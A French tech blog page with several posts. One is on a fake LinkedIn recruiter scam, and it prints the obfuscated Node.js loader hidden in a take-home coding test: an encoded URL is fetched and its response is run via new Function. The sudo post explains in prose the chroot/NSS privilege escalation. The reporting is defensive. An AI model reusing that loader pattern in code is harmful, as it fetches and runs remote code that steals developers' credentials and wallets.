Vue normale

Il y a de nouveaux articles disponibles, cliquez pour rafraîchir la page.
À partir d’avant-hierFlux principal

Attention au piège du faux recruteur Linkedin !

Par : Korben
17 octobre 2025 à 11:43

Vous avez peur que l’IA prenne votre boulot ? Et bien David Dodda, lui, a failli se faire avoir par un faux boulot et c’est son IA qui l’a sauvé ! Je vous explique !

Tout commence classiquement sur LinkedIn. David reçoit un message de Mykola Yanchii, Chief Blockchain Officer chez Symfa, une boîte qui développe des plateformes blockchain. Le profil LinkedIn a l’air béton… Il a plus de 1000 connexions, une page entreprise nickel, bref tout respire le sérieux.

Et son message est pro, poli, et propose à David un poste à temps partiel sur BestCity, une plateforme immobilière. Bref, c’est le genre d’opportunité qu’on ne refuse pas quand on est développeur freelance comme David.

Le premier rendez-vous par visio se passe très bien. Le recruteur connait son sujet, pose les bonnes questions, explique le projet et ensuite, comme dans 99% des processus de recrutement tech, on envoie à David un test technique à réaliser chez lui. Il s’agit d’un projet hébergé sur Bitbucket, du code React et Node.js bien propre et sa mission c’est de compléter quelques fonctionnalités et renvoyer le tout avant la prochaine réunion.

Sauf que David, lui, a pris un réflexe que peu de gens ont. Avant même de lancer npm install, il a demandé à son assistant IA (Cursor) de scanner le code pour détecter d’éventuels patterns suspects. Et là, bingo ! L’IA trouve un truc louche dans le fichier server/controllers/userController.js.

Il s’agit d’un malware qui était bien planqué dans une fonction asynchrone complètement obfusquée. Un tableau d’octets encodé en ASCII qui, une fois décodé en UTF-8, révèle une URL pointant vers une API externe. Et cette URL récupère un payload qui est ensuite exécutée avec tous les privilèges Node.js. Cela débouche à sur un accès complet au système, aux credentials, aux wallets crypto, aux données clients…etc. Le jackpot pour un attaquant !

//Get Cookie
(async () => {
 const byteArray = [
 104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,
 110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,
 98, 50, 48, 51, 49, 102, 98, 57
 ];
 const uint8Array = new Uint8Array(byteArray);
 const decoder = new TextDecoder('utf-8');
 axios.get(decoder.decode(uint8Array))
 .then(response => {
 new Function("require", response.data.model)(require);
 })
 .catch(error => { });
})();

Et le truc flippant, c’est le niveau de sophistication de l’opération car là on n’a pas affaire à un script kiddie qui balance un trojan par email. Non, c’est une vraie infrastructure professionnelle avec un profil LinkedIn premium, un Calendly pour la prise de rendez-vous, un Bitbucket privé, du code source propre et fonctionnel (hormis le malware planqué). Et surtout, l’URL du malware est devenue HS 24 heures à peine après l’attaque. C’est donc une infrastructure éphémère qui laisse zéro trace.

Si je relaye ce témoignage de David c’est parce que ce genre d’attaque se multiplie. Ce n’est pas un cas isolé… Par exemple le groupe nord-coréen Lazarus utilise cette technique depuis des mois, en créant de fausses entreprises crypto, de faux profils de recruteurs sur LinkedIn, Upwork, Freelancer, et en ciblant spécifiquement les développeurs. Le malware déployé s’appelle BeaverTail, et il installe ensuite un backdoor Python baptisé InvisibleFerret qui fonctionne sur Windows, Linux et macOS. Ce truc vise surtout les extensions de navigateur comme MetaMask ou Coinbase Wallet, récupère tous les mots de passe stockés, et collecte tout ce qui traine.

Alors pourquoi ça marche aussi bien ?

Hé bien parce que les hackers exploitent nos biais cognitifs. L’ambition de décrocher un bon job, la politesse pour ne pas vexer un recruteur, l’urgence créée artificiellement pour qu’on ne prenne pas le temps de réfléchir, la peur de rater une opportunité. Bref, toutes ces émotions qui court-circuitent notre esprit critique.

Heureusement que David a lancé une analyse IA du code sinon, il aurait eu de gros problèmes. Ça prend 30 secondes comme geste barrière et ça peut vous sauver des milliers d’euros et des centaines d’heures de galère.

Si David n’avait pas eu ce réflexe, il aurait lancé npm install, puis npm start, et le malware se serait exécuté en arrière-plan pendant qu’il codait tranquillement ses fonctionnalités. L’attaquant aurait alors eu accès à tout : Ses identifiants GitHub, ses clés SSH, ses tokens d’API, ses wallets crypto si il en a et peut-être même les données de ses clients. Le cauchemar absolu.

Voilà, donc méfiez vous de ce qui arrive via des plateformes de recrutement, on ne sait jamais ! Vous n’aurez peut être pas le job mais vous garderez votre ordinateur propre, vous conserverez vos cryptos, vos mots de passe et vos clients et ça c’est déjà pas si mal !

Source

La plus petit drone FPV du monde ?

Par : Korben
17 octobre 2025 à 10:50

Vous avez déjà passé trois semaines à résoudre un problème qui n’existe pas ?

Hé bien Sam Hoarder, lui, a fait encore mieux. Il a pris un drone FPV déjà ultra-compact, le BetaFPV Air65 avec ses 65mm d’empattement, et l’a transformé en un truc trois fois plus petit, dix fois plus galère à piloter, et totalement inutile !

22 millimètres d’empattement de moteur à moteur, ça qui tient dans une boîte de Pringles et c’est génial. Parce que OUI, dans un monde tech obsédé par des specs toujours plus impressionnantes, des autonomies de 48 heures et des écrans pliables dans tous les sens, Sam a fait un truc qui sert à rien. Il a pris un drone qui vole très bien et s’est dit “hey, comment je pourrais rendre ce drone encore moins pratique à pilote ?

Les hélices de l’Air65 de base font 31mm de diamètre, les moteurs font 9mm et si on fait se chevaucher les quatre hélices au maximum, on obtient théoriquement 31 - 9 = 22 mm d’empattement. Voilà, c’est tout… sauf que pour y arriver, il a fallu modéliser chaque composant dans SolidWorks, designer un cadre custom en deux plaques avec des supports moteur décalés, imprimer le tout en PLA avec une précision de 0,12 mm, et bien sûr démonter entièrement l’Air65 pour en remonter les moteurs avec des vis de montre, découper des oeillets au micron près, reconfigurer l’orientation du contrôleur de vol dans Betaflight avec un angle à 45°, et croiser les doigts très fort !!

Et le résultat est là puisque sont nouveau drone pèse 25 grammes tout mouillé avec sa batterie Lava 300mAh (qui est plus grande que le drone lui-même, au passage). La batterie dépasse donc littéralement du cadre. On dirait un cure-dent avec un sac à dos son machin et les quatre hélices se frôlent avec un espacement ridicule.

Et pour le décollage, c’est impossible de la faire partir posé au sol, car les hélices se touchent. Il faut donc le tenir délicatement entre deux doigts, armer les moteurs en priant pour ne pas déclencher le système anti-runaway, et le lâcher au moment précis où il commence à tenir.

Sam a filmé ses premiers essais et on le voit galérer pendant trois bonnes minutes, le drone dans une main, la radiocommande dans l’autre, essayant de trouver le timing parfait. C’est stressant à regarder, j’avoue et quand il y arrive enfin, le drone s’envole, vole correctement (ce qui est déjà un miracle), et on se dit “OK, mais maintenant il va faire quoi avec ?”

Hé bien rien. Absolument rien ^^.

Par contre, Sam a mis tous ses fichiers 3D gratuitement sur MakerWorld donc libre à vous de reproduire ce projet complètement inutile si ça vous chauffe.

Amusez-vous bien !

Windows 11 ne peut plus se parler à lui-même car Microsoft a cassé localhost

Par : Korben
17 octobre 2025 à 10:23

Vous connaissez ce mème que tous les barbus sans originalité ont sur un t-shirt ou une tasse et qui dit : “There’s no place like 127.0.0.1” ? (Oui moi aussi j’ai eu un t-shirt comme ça ^^)

Ce jeu de mots culte fait référence au Magicien d’Oz et surtout au localhost, qui est l’adresse locale où votre machine se connecte à elle-même. Eh bien mauvaise nouvelle, Microsoft vient de la rendre littéralement inopérante avec leurs dernières mises à jour de merde. Ainsi, Windows 11 ne peut plus accéder à sa propre adresse localhost. C’est fou quand même ! On dirait presque une blague mais non…

Les patchs KB5066835 et KB5065789 sortis en joli mois d’octobre ont pété totalement HTTP.sys, un composant du kernel Windows qui permet aux applications de discuter en local via HTTP/2. Du coup, les connexions vers 127.0.0.1 en HTTP/2 plantent systématiquement avec des messages d’erreur du genre ERR_CONNECTION_RESET ou ERR_HTTP2_PROTOCOL_ERROR.

Votre machine ne se reconnaît plus. Elle est là, elle fonctionne, mais elle ne peut plus se pinguer elle-même. Et évidemment, ceux qui trinquent ce sont surtout les développeurs. Visual Studio ne peut plus déboguer correctement, SQL Server Management Studio refuse de se connecter avec l’authentification Entra ID, l’application Duo Desktop, utilisée pour le 2FA, est complètement KO. Même des softs pros comme Autodesk Vault sont touchés.

Bref, si vous bossez avec du dev local ou des outils qui tournent en localhost, vous êtes dans la mierda.

Microsoft a corrigé dans ce patch un nombre record de 175 vulnérabilités CVE, dont 6 zero-days critiques et ils ont aussi fait le ménage en supprimant un vieux driver Agere Modem vieux de 20 ans qui traînait encore. Ils ont nettoyé, sécurisé, et optimisé Windows un peu plus mais visiblement sans faire quelques vérifications de base. Je trouve ça vraiment surprenant qu’aucun dev chez Microsoft ne s’en soit rendu compte avant que ça parte en prod.

Bon et alors, comment on s’en sort de leur nouvelle connerie ? Hé bien il y a 2 solutions, pas très classes mais qui fonctionnent.

La première, c’est de bidouiller le registre Windows pour désactiver HTTP/2. Vous allez dans

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters

Et vous mettez EnableHttp2Tls et EnableHttp2Cleartext à 0.

Redémarrage obligatoire (C’est Windows, bébé) et voilà !

La deuxième solution, plus radicale, consiste à désinstaller les mises à jour. Un petit coup de

wusa /uninstall /kb:5066835

ou

wusa /uninstall /kb:5065789

dans votre terminal et hop, vous retrouvez votre localhost fonctionnel, sauf que voilà, au bout d’un moment, Windows Update va gentiment vous les réinstaller automatiquement au prochain redémarrage si vous ne faites pas gaffe. C’est un peu comme votre ex toxique qui revient sans cesse dans votre vie…

Le truc encore plus wtf dans cette histoire, c’est que ce bug n’existe pas sur les installations toutes fraîches de Windows 11 24H2. Donc si vous installez Windows 11 proprement depuis zéro, localhost fonctionnera nickel. C’est seulement si vous avez mis à jour votre machine que vous êtes maudit du cul. Microsoft suggère donc “implicitement” que la meilleure solution serait… de tout réinstaller ! Bah ouais, on a que ça à foutre ! Merci du conseil, les gars.

Bref, encore une fois, on a l’impression que les équipes QA de Redmond ont pris des vacances prolongées. Bref, encore un fail monumental ! Bilou reviens, tu nous manques ! ^^

Voilà, donc si vous êtes développeur et que Visual Studio vous fait la gueule depuis début octobre comme un ado qui viendrait de se lever, vous savez maintenant pourquoi. Ce n’est pas votre code qui est pourri (enfin, peut-être qu’il l’est, mais c’est un autre sujet…), c’est juste Windows 11 qui a la gueule de bois !

Home sweet home ? Plutôt “home where is my home ?”, ouais.

Source

Unfatten pour macOS - Récupérez de l'espace disque en supprimant le code mort de vos apps et plugins audio

Par : Korben
16 octobre 2025 à 12:40

Vous avez un Mac M1, M2, M3 ou M4 ? Bonne nouvelle, vous trimballez probablement entre 50 et 100 GB de code complètement inutile que votre processeur n’exécutera jamais et ce, depuis le jour où vous avez acheté votre superbe machine.

Les coupables ce sont les binaires universels de vos plugins audio (VST…etc) et vos apps traditionnelles qui contiennent maintenant deux versions complètes du code : une pour Intel, une pour Apple Silicon. Et comme votre Mac n’utilise qu’une seule de ces versions, mais vous payez le prix fort en espace disque pour les deux.

Car depuis 2020 et la transition vers Apple Silicon, Apple a choisi la simplicité : un seul fichier pour tout le monde ! Le développeur compile son code deux fois (Intel + ARM), colle les deux versions ensemble, et hop, vous vous retrouvez avec des fichiers littéralement deux fois plus gros qu’ils ne devraient l’être.

Et c’est là qu’ Unfatten entre en jeu. Ce petit outil gratuit fait exactement ce que son nom indique : il dégonfle vos plugins et vos applications en supprimant la partie du code que vous n’utilisez pas. Si vous êtes sur Apple Silicon, il vire le code Intel et si vous êtes encore sur Intel, il peut virer le code ARM (mais attention, si vous comptez upgrader votre Mac un jour, vous devrez tout réinstaller).

L’utilisation est ultra simple, vous sélectionnez les dossiers contenant vos apps et plugins, vous choisissez les formats à scanner (AAX, VST, VST3, AU), et vous lancez le scan. L’outil propose un mode simulation qui permet de voir exactement combien d’espace vous allez récupérer sans rien toucher et une fois que vous avez vu les chiffres (et croyez-moi, ils font mal), vous pouvez lancer le nettoyage réel !

Pensez quand même à faire un backup de vos plugins avant car on n’est jamais trop prudent avec ses plugins audio à 200 euros pièce qu’on ne peut pas toujours re-télécharger facilement. Après pour les apps, c’est moins critique, suffit de la réinstaller.

Pensez aussi à repasser un petit coup de Unfatten après d’éventuelles mises à jours des apps ou des plugins.

D’ailleurs, j’sais pas si vous savez mais macOS 26 Tahoe est la dernière version à supporter du x64 avec Rosetta 2, qui permet de faire tourner les apps Intel sur Apple Silicon.

Voilà, l’outil est disponible ici sur avelio.tech/unfatten et si au premier lancement, vous avez un avertissement de sécurité, passez par Sentinel pour le débloquer.

Merci à Lorenper pour l’info !

Sécurité post-quantique - Ils pensaient que c'était impossible, alors Signal l'a fait !

Par : Korben
15 octobre 2025 à 10:13

L’apocalypse de l’informatique quantique, c’est un truc que les experts annoncent régulièrement depuis 30 ans. Et cette fois ça commence à se préciser car si j’en crois Gartner , c’est pour 2029 - 2034 !

C’est le “on verra ça la semaine prochaine” éternel de la sécurité informatique, sauf que pendant que tout le monde rigole nerveusement en se disant on a le temps, Signal, eux s’attaquent sérieusement au sujet. Et il viennent de publier un write-up technique assez long expliquant comment ils ont déjà régler le problème.

Actuellement, seulement 18% des entreprises du Fortune 500 ont des réseaux protégés contre les ordinateurs quantiques donc autant vous dire que pas grand monde n’est prêt. Heureusement, on va tous pouvoir s’inspirer de ce qu’a fait Signal qui a mis au point un nouveau système baptisé SPQR (Sparse Post Quantum Ratchet, que j’imagine être un jeu de mot avec le SPQR romain… ).

Le problème, c’est que la cryptographie post-quantique, c’est pas juste une mise à jour de sécurité comme les autres. Concrètement, les nouvelles clés cryptographiques résistantes aux ordinateurs quantiques (ML-KEM-768, pour les intimes) font 2 272 bytes alors que les anciennes clés ECDH ne sont que de 32 bytes. C’est donc 71 fois plus gros et donc nos échanges chiffrés vont consommer encore plus de bande passante.

Et ça, c’est juste la partie visible du problème car Signal, c’est pas WhatsApp qui peut se permettre de dire “tant pis, on a de la thune, on va juste consommer plus de bande passante”. Non, Signal lui doit fonctionner partout c’est à dire aussi bien sur les vieux téléphones, que sur les réseaux pourris, ou dans les pays où les gouvernements surveillent activement le trafic. Et tout ça en restant plus sécurisé que n’importe quel autre service. C’est pas évident donc…

En 2023, Signal avait déjà fait une première mise à jour post-quantique avec PQXDH . L’idée, c’était de sécuriser la phase d’initialisation des conversations (le fameux handshake) au travers d’une approche hybride. En gros, on garde l’ancienne méthode X25519 et on ajoute un Kyber-1024 par-dessus, comme ça, même si les ordinateurs quantiques cassent l’une des deux protections, l’autre tient encore.

C’est malin, mais bon, ça ne suffisait pas car le handshake, c’est juste le début pour initialiser la conversation. Alors Signal a mis au point un système appelé le “Double Ratchet” qui fait évoluer les clés de chiffrement en permanence. Ainsi, à chaque message envoyé ou reçu, hop, de nouvelles clés sont générées. C’est ce qui donne à Signal ses super-pouvoirs : la forward secrecy (en gros, ça veut dire que si on vous pirate aujourd’hui, on ne peut pas déchiffrer vos vieux messages) et la post-compromise security (si on vous pirate, vous récupérez automatiquement une connexion sécurisée après quelques échanges).

Ce Double Ratchet, c’était une merveille d’ingénierie, sauf que devinez quoi… il repose entièrement sur ECDH, qui sera totalement cassable par les ordinateurs quantiques d’ici quelques années.

Donc il a fallu tout repenser !

Signal a donc ajouté un troisième ratchet au système. Un Triple Ratchet, le SPQR, qui fonctionne en parallèle des deux autres et injecte régulièrement des secrets post-quantiques dans le mélange.

L’astuce géniale, c’est qu’ils utilisent des “erasure codes”. C’est un peu comme les codes de correction d’erreur sur les CD, mais pour reconstituer des clés cryptographiques manquantes. Hé oui parce que sur un réseau merdique (ou surveillé par un vilain méchant gouvernement), des paquets se perdent. Du coup, avec les erasure codes, même si vous loupez quelques messages, vous pouvez quand même reconstituer les clés.

Et pour régler le problème de la taille des clés (vous vous souvenez, l’explosion de la bande passante ?), ils ont parallélisé les échanges de clés comme ça au lieu d’envoyer une grosse clé à chaque message, ils en envoient plusieurs petites en parallèle, réparties sur plusieurs messages. Ainsi, l’impact sur la bande passante reste raisonnable.

Voilà, donc pour résumer Signal a réussi à ajouter une protection post-quantique complète, en maintenant la forward secrecy et la post-compromise security, tout en gérant les environnements asynchrones (quand les gens sont offline), les réseaux pourris et les adversaires actifs. Tout ça avec un impact minimal sur les perfs ! C’est beau non ?

Et le plus beau dans tout ça c’est que pour nous, les utilisateurs rien ne change ! Toute cette complexité technique est totalement invisible. D’ailleurs les entreprises françaises feraient bien de se mettre sur le sujet car le temps passe vite. L’ANSSI a même tiré la sonnette d’alarme et fixé des échéances précises pour que les entreprises se bougent. Les secteurs les plus à risque (banques, santé, infrastructures critiques…) sont en première ligne. En plus quand on sait que les cybercriminels (et la NSA et compagnie) stockent déjà des données chiffrées pour les déchiffrer plus tard avec des ordinateurs quantiques, l’excuse du “on verra plus tard” ne tient plus vraiment la route.

Signal a ouvert totalement son code et publié ses algos et autres formules donc chaque entreprise qui le souhaite peut aller s’en inspirer. Pour une ONG c’est impressionnant ce qu’ils ont réussi là et ça prouve encore une fois qu’en matière de sécurité, il n’y a pas de fatalité.

Juste des choix.

Source

Sudo - Sortir de prison et devenir root !

Par : Korben
14 octobre 2025 à 14:38

La commande sudo que tous les linuxiens connaissent a plus de 40 ans, tout autant d’années d’audits de sécurité, des millions de lignes de code scrutées par des milliers de développeurs au fil des ans et surtout des dizaines de CVE critiques corrigées.

Et pourtant on est jamais à l’abri d’une mauvaise surprise ! En effet, une fonctionnalité ajoutée récemment pour “améliorer” la sécurité a crée un trou béant. Baptisée CVE-2025-32463, cette une faille critique présente dans sudo est même déjà exploitée par des cybercriminels.

Alors qu’est ce qui se passe exactement ? Hé bien en 2023, les développeurs de sudo ajoutent une amélioration dans la version 1.9.14. L’option --chroot (qui permet d’isoler une commande dans une “prison” système) est améliorée pour mieux gérer le “command matching”. Ça part d’une bonne intention, comme toujours mais cela a débouché sur l’une des pires CVE de l’année.

Rich Mirch de Stratascale découvre alors le problème en juin 2025. Ainsi, quand sudo fait un chroot dans un répertoire contrôlé par l’utilisateur, il demande ensuite “qui es-tu ?” via NSS (Name Service Switch, le système qui résout les infos utilisateurs). Sauf que NSS lit ses fichiers de config… dans le chroot. Votre chroot, celui que vous contrôlez. Gloups !

Il suffit alors de placer un faux /etc/nsswitch.conf et une bibliothèque partagée malveillante dans votre répertoire. Sudo fait son petit chroot dedans, charge votre lib pour vérifier qui vous êtes… et hop votre code s’exécute en root. Ainsi, n’importe quel utilisateur local, sans droits sudo préexistants, peut devenir root. C’est con hein ?

C’est tout con à exploiter ! Et le score de cette faille est critique puisqu’on est sur un CVSS de 9.3 / 10. Et comme les PoC (proof of concept) sont disponibles sur Github dans plein de versions différentes (genre celle là ou celle là ), c’est la fête à l’exploitation sauvage !!

Le 29 septembre dernier, la CISA a même ajouté la CVE-2025-32463 au catalogue KEV (Known Exploited Vulnerabilities), ce qui confirme son exploitation dans la nature. Les agences fédérales américaines ont donc jusqu’au 20 octobre 2025 pour patcher.

Donc oui, c’est du sérieux.

Notez que le patch est disponible depuis le 30 juin 2025 . Sudo 1.9.17p1 corrige donc ce problème et la fonctionnalité --chroot est maintenant marquée comme “dépréciée”. Les développeurs ont compris que cette idée était bancale dès le départ.

Donc si vous êtes admin système et que vous n’avez pas encore mis à jour, c’est le moment, les amis !! Les versions vulnérables vont de sudo 1.9.14 à 1.9.17. Les versions antérieures (avant 1.9.14) ne sont pas touchées, car la fonctionnalité n’existait pas. Et les plus récentes (1.9.17p1+) sont patchées. Ouf !

Comme quoi, même le code le plus vénéré par les barbus peut se foirer sur une nouveauté. En tout cas, bien joué à Rich Mirch pour avoir trouvé ça ! Et sincèrement désolé pour les devs qui ont validé ce commit foireux en 2023, qui ont dû s’en vouloir un peu quand même ^^.

Source

J'ai testé un détecteur de gaz radon et c'est flippant !

Par : Korben
8 octobre 2025 à 17:14
– Article contenant des liens affiliés –

Vous connaissez le radon ? C’est ce gaz radioactif qui s’infiltre insidieusement dans nos maisons depuis le sol. Et si vous habitez en Auvergne comme moi ou en Bretagne ou dans une région où il y a du radon , vous êtes peut-être dans une zone à risque. C’est pour cela que j’ai acheté un détecteur Ecosense EcoBlu EB100 pour voir enfin comment ça se passait vraiment chez moi.

Mais avant de vous parler du produit, laissez-moi quand même vous expliquer ce qu’est le radon… Il s’agit d’un gaz radioactif naturel qui vient de la désintégration de l’uranium présent dans le sol. Il est inodore, incolore, invisible. Vous ne le sentez pas, vous ne le voyez pas, mais il est là. Et le truc, c’est qu’en Auvergne, avec notre sous-sol granitique du Massif Central, on est particulièrement exposé.

Le radon entre donc dans les maisons par les fissures, les passages de canalisations, les caves, les vides sanitaires…etc et remonte du sol pour finir par se concentrer dans les pièces fermées. Et là, c’est pas bon du tout !! Le Centre international de recherche sur le cancer a classé le radon comme cancérigène certain pour le poumon depuis 1987. En France, c’est d’ailleurs la deuxième cause de cancer du poumon après le tabac. Rien que ça ! Le radon c’est donc environ 3 000 décès par an.

Du coup, ça fait un petit moment que je sais que l’Auvergne fait partie des zones les plus touchées en France avec la Bretagne, le Limousin et la Corse, mais je m’en étais pas trop inquiété jusqu’à ce que je lise un article scientifique là dessus. J’ai donc voulu savoir à quoi moi et ma famille on s’exposait parce que bon, c’est vrai qu’en hiver, je suis pas le champion de l’aération ! Puis surtout, on est un peu impuissant face à un truc qu’on ne voit pas. Donc au moins, si on peut le mesurer, on peut agir !

Bref, l’ Ecosense EcoBlu EB100 , c’est un petit boîtier blanc de la taille d’un réveil. Vous le branchez, et en 10 minutes vous avez déjà une première lecture. Après pour un résultat vraiment fiable, il faut attendre une heure. L’écran LED affiche alors le taux de radon en temps réel, la moyenne du jour, de la semaine et du mois. C’est super simple à utiliser !

Initialisation en cours…

Y’a même une alarme qui se déclenche si les niveaux deviennent critiques. Pour info, le seuil de référence en France, c’est 300 Bq/m3 en moyenne annuelle. Au-dessus, il faut agir.

Chez moi, les premiers jours, j’étais à 450 Bq/m3 dans le salon. Carrément au-dessus du seuil donc. Du coup, j’ai fait ce qu’il faut : aérer à fond ! Et assez rapidement finalement, c’est revenu à des taux plus tolérables, autour de 100 Bq/m3, parfois moins. J’ai renforcé la ventilation dans les pièces du sous-sol car c’est par là que ça arrive et surtout j’aére tous les jours. Et ce qui est bien avec cet appareil, c’est que machinalement je pose les yeux dessus et donc j’y pense et j’ouvre les fenêtres.

Sans ça, j’en aurais pas vraiment conscience par contre, et finalement je ne saurais pas si j’aère la maison assez ou pas.

Car ce qui est important à comprendre surtout, c’est que le taux de radon varie tout le temps. Selon la météo, la saison, l’état de vos fondations, le chauffage que vous mettez…etc. En fonction de tout un tas de critères, les taux peuvent monter ou descendre. C’est assez random. Y’a des matin, je me lève et je suis à 30 Bq/m3 et d’autres matins, c’est la fiesta largement au dessus des 300… Bref, l’EcoBlu me permet de surveiller ça en continu.

Après à ce prix, c’est quand même un investissement mais ça vaut le coup si vous êtes en zone à risque et si vous avez une maison ou en rez de chaussée d’apart. Si vous êtes en étage, y’a moins de risque d’être intoxiqué par cette saloperie.

Maintenant ce qu’il faut retenir c’est que le radon, c’est pas une blague. C’est comme si vous fumiez plusieurs clopes tous les jours ! Imaginez ça sur des années, ça craint ! Et si en plus, vous fumez pour de vrai, le risque de cancer du poumon est multiplié par 20.

L’idéal c’est quand même de repasser sous la barre des 100…

Voilà, après en dehors de l’aération, vous pouvez aussi agir sur l’étanchéité de votre maison. Colmater les fissures dans les dalles, les passages de canalisations, mettre une membrane étanche dans la cave si elle est en terre battue, ventiler les vides sanitaires…etc… Bref, limiter les entrées du radon depuis le sol c’est jouable ! L’idéal, c’est évidemment une VMC qui tourne en continu et pas juste une aération ponctuelle car le radon s’accumule quand l’air ne circule pas. Ainsi, plus vous renouvelez l’air intérieur, moins le radon stagne.

Perso, j’ai installé 2 ventilations à la cave comme je vous le disais. C’est mieux que rien, mais ça ne suffit pas.

En tout cas, je ne regrette pas cet achat de détecteur temps réel. Matérialiser un danger invisible, ça change tout et maintenant, que je vois les chiffres, je sais quand il faut aérer, et je sais que je ne me pèle pas les noisettes pour rien en plein hiver. Bref, c’est rassurant surtout !

Voilà, donc si vous êtes en Auvergne, Bretagne, Limousin, Vosges, Alpes, Corse… ou n’importe quelle zone granitique, je vous conseille vivement de mesurer le radon chez vous. Vous serez peut-être surpris… au mieux, vous découvrirez que tout va bien et vous pourrez renvoyer ce détecteur à Amazon et vous faire rembourser et au pire, vous corrigerez ce problème avant qu’il ne devienne grave…

Sources :

Synology capitule et annule le verrouillage des disques durs après 6 mois de boycott acharné

Par : Korben
8 octobre 2025 à 16:44

6 petits mois, c’est le temps qu’il aura fallu à la communauté “NAS” pour faire plier Synology et son délire de verrouillage propriétaire . Comment je le sais ? Hé bien DSM 7.3 vient de sortir, et visiblement, leurs foutues restrictions sur les disques Seagate et Western Digital ont complètement disparu. Woohoo \o/ !

Ça s’est fait sans fanfare, ni excuses, mais juste en mode marche arrière à fond la caisse ! Ouééé, c’est ça qu’on voulait !

Retour rapide quand même sur l’histoire… En avril de cette année, on ne sait pas pourquoi, Synology décide que ses nouveaux NAS DS925+, DS1825+ et DS425+ n’accepteront que leurs propres disques HAT3300 et HAT5300.

Traduction, faudra payer 30 à 40% de plus pour exactement le même matos rebrandé ! Du coup, les Seagate IronWolf et WD Red qui fonctionnaient parfaitement depuis des années, aux chiottes ! Et si vous voulez installer DSM sur un disque non-approuvé, un NAS comme le DS925+ refuse carrément de booter.

Et comme y’a pas de VRAIE raison technique à cela, la réaction a été immédiate et brutale. Les ventes se sont effondrées, les revendeurs ont commencé à recommander activement QNAP, TrueNAS, UGREEN et les clients ont annulé leurs précommandes.

Même les reviewers tech ont qualifié ce move de Synology de “greedy and shortsighted” ce qui pourrait se traduire par cupide et sans vision à long terme…

Et au delà du boycott pur, la communauté s’est aussi bougé le cul. Car pendant que Synology tenait bon sur sa position stuipide, des scripts Python ont fleuri un peu partout sur GitHub pour contourner ces restrictions. Des guides complets ont été publiés sur XDA-Developers expliquant comment se connecter en Telnet et patcher l’installation de DSM pour accepter n’importe quel disque et c’est comme ça que des gens ont commencé à hacker leurs propres NAS qu’ils venaient d’acheter plusieurs centaines d’euros.

C’est ça la vraie passion les gars !! ^^

Puis quand vos propres partenaires commerciaux historiques vous lâchent, vous savez que vous avez merdé…. Breeeef, Synology a fait demi-tour et même si ce n’est pas une révélation éthique (ils ont juste compris que le jeu n’en valait pas la chandelle), c’est tout à leur honneur ! D’autres se seraient entêtés jusqu’à mettre en danger la boite. Je pense par exemple à HP et ses cartouches d’imprimante à puce… Ça s’est soldé par un règlement judiciaire à plusieurs millions et une réputation en charpies.

Voilà… Donc maintenant avec DSM 7.3 qui sort aujourd’hui, les disques Seagate et Western Digital fonctionnent à nouveau comme avant. Le monitoring complet, les alertes, et toutes les fonctionnalités software sont rétablies et ces maudits warnings “unverified” ont disparu. Vous pouvez à nouveau installer ce que vous voulez dans votre NAS comme si de rien n’était !

Ouf ! Encore une victoire de canard gagnée en votant avec le portefeuille !

Source

SSHM - Un super gestionnaire pour SSH

Par : Korben
8 octobre 2025 à 16:06

Guillaume, fidèle lecteur de Korben.info depuis un looong moment, s’était bricolé un script bash pour gérer ses connexions SSH. Vous savez, c’est le genre de script qu’on améliore petit à petit, puis qu’on finit par ne plus oser toucher de peur de tout casser. C’est pratique, mais pour reprendre les mots de Guillaume dans le mail qu’il m’a écrit, c’est pas très “élégant”.

Puis il est tombé sur deux articles que j’avais écrits : un sur ssh-list , un sur ggh qui sont deux outils sympas pour gérer les connexions SSH depuis le terminal. Mais de son point de vue, incomplets. Et là, il a eu un déclic : “Et si je combinais les deux, en ajoutant ce qui me manque ?

Et un mois plus tard, SSHM était né . On est loin du script du départ puisqu’il a codé un véritable outil en Go avec Bubble Tea , dans une interface TUI moderne, avec un support complet du ~/.ssh/config, une organisation par tags, un historique des connexions, et même du port forwarding avec mémoire. Bref un truc super abouti.

Puis environ 1 mois après la sortie de la première version, Guillaume a continué à implémenter pas mal de nouveautés : gestion interactive des hôtes SSH, recherche intelligente multi-mots, indicateurs de statut en temps réel, support ProxyJump, directives Include gérées correctement, personnalisation des raccourcis clavier, compatible Linux/macOS/Windows. Le tout dans un binaire unique sans dépendances.

Faut vraiment que vous testiez car c’est c’est chouette. Je trouve que SSHM a dépassé largement ses inspirations. Par exemple, ssh-list organise vos serveurs en groupes alors que SSHM utilise des tags. Ça permet de marquer un serveur “prod” + “web” + “urgent” et du coup c’est beaucoup plus flexible que de ranger ça dans des dossiers statiques.

ggh fait également du session recall. Cela veut dire qu’il se souvient de vos dernières connexions SSH et vous permet de les relancer rapidement. Et bien SSHM fait ça AUSSI, mais en plus il gère toute votre config SSH : Ajout, édition, suppression d’hôtes, directement depuis l’interface TUI. En vrai, Guillaume n’a pas copié-collé les idées de ces outils mais a repensé totalement l’organisation même de la gestion SSH.

Prenez le port forwarding. Combien de fois vous avez perdu vos notes sur vos tunnels SSH ? Hé bien SSHM lui se souvient de vos dernières configs de tunnels locaux, distants, SOCKS…etc. Si vous forwardez toujours le port 3306 de votre base MySQL de dev, SSHM retiendra les paramètres. Ça fait gagner grave de temps car vous n’avez plus à vous rappeler de la syntaxe “ssh -L 3306:localhost:3306 user@serve” à chaque fois. C’est un petit détail qui prouve bien que cet outil a été créé par quelqu’un qui UTILISE vraiment SSH au quotidien, et pas juste pour faire un script vite fait.

L’interface TUI est plutôt fluide, avec des raccourcis clavier configurables et vous pouvez même désactiver ESC si vous êtes un puriste vim qui déteste les touches d’échappement. Les indicateurs de connectivité SSH s’affichent en couleur en temps réel (vous voyez d’un coup d’œil quels serveurs répondent) et il y a une superbe recherche (un filtre en réalité) par nom et par tags, qui supporte plusieurs mots. Et si vous préférez scripter, SSHM fonctionne aussi en CLI pur. Par exemple, “sshm connect prod-web-01” dans un script bash, et ça marchera en gardant l’historique des connexions.

Un autre point technique important pour les admins qui ont des configs SSH complexes : SSHM gère correctement les directives Include . Hé oui, beaucoup d’outils cassent quand vous avez un ~/.ssh/config qui include des fichiers séparés comme ~/ssh/work et ~/ssh/perso. SSHM est capable non seulement de les lire mais aussi de les éditer correctement.

